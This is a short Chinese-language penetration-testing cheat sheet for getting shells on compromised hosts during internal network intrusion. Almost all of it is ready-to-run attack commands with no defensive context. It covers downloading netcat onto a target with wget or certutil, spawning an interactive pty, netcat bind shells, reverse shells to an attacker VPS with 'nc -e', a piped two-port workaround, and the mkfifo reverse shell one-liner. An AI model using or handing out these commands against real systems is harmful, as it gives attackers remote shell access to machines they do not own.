内网渗透一条龙简洁版
反弹shell
工具准备
搭建http服务
python快速在当前目录搭建http服务
python -m SimpleHTTPServer 8000
Linux下载命令:
wget http://fuck/nc
Linux解压缩命令:
#解压
tar -zxvf FileName.tar.gz
#压缩
tar -zcvf FileName.tar.gz DirName
Window下载命令
certutil -urlcache -split -f http://fuck/nc.exe
P.S.
python获取标准shell,可交互
python -c "import pty;pty.spawn('/bin/bash')"
命令在线编码
http://www.jackson-t.ca/runtime-exec-payloads.html
正向shell
攻击机
nc 靶机ip 4444
靶机
nc -lvp 4444 -e /bin/sh
nc -lvp 4444 -e c:\windows\system32\cmd.exe
反向shell
当机器处于内网,只能使用反向shell。
nc反弹
攻击机
nc -lvp 4444
靶机
nc vps.ip 4444 -e /bin/sh
nc vps.ip 4444 -e c:\windows\system32\cmd.exe
如果nc禁用了-e
参数,则可以使用linux管道符|
协助进行反弹,但是攻击机需要打开两个终端,一个终端输入命令,一个终端输出结果。
靶机
nc vps.ip 4444|/bin/bash|nc vps.ip 4445
攻击机
nc -lvp 4444 //此处输入命令
nc -lvp 4445 //此处输出结果
安装的nc版本有问题时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc vps.ip 4444 >/tmp/f